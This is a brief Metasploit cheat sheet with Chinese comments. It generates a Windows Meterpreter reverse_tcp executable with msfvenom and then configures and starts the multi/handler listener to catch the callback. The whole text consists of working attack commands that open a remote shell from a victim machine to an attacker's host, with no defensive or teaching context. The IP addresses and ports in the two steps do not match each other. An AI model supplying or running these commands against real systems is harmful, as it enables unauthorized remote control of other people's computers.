1,
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.55 lport=4444 -f exe > /root/shell.exe
2,use exploit/multi/handler 监听模块
msf > use exploit/multi/handler #加载模块
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #设置payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost kali的ip #设置kali的ip
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211 #设置kali的端口
lport => 1211
msf exploit(multi/handler) > exploit #执行
[*] Started reverse TCP handler on 222.222.221.140:1211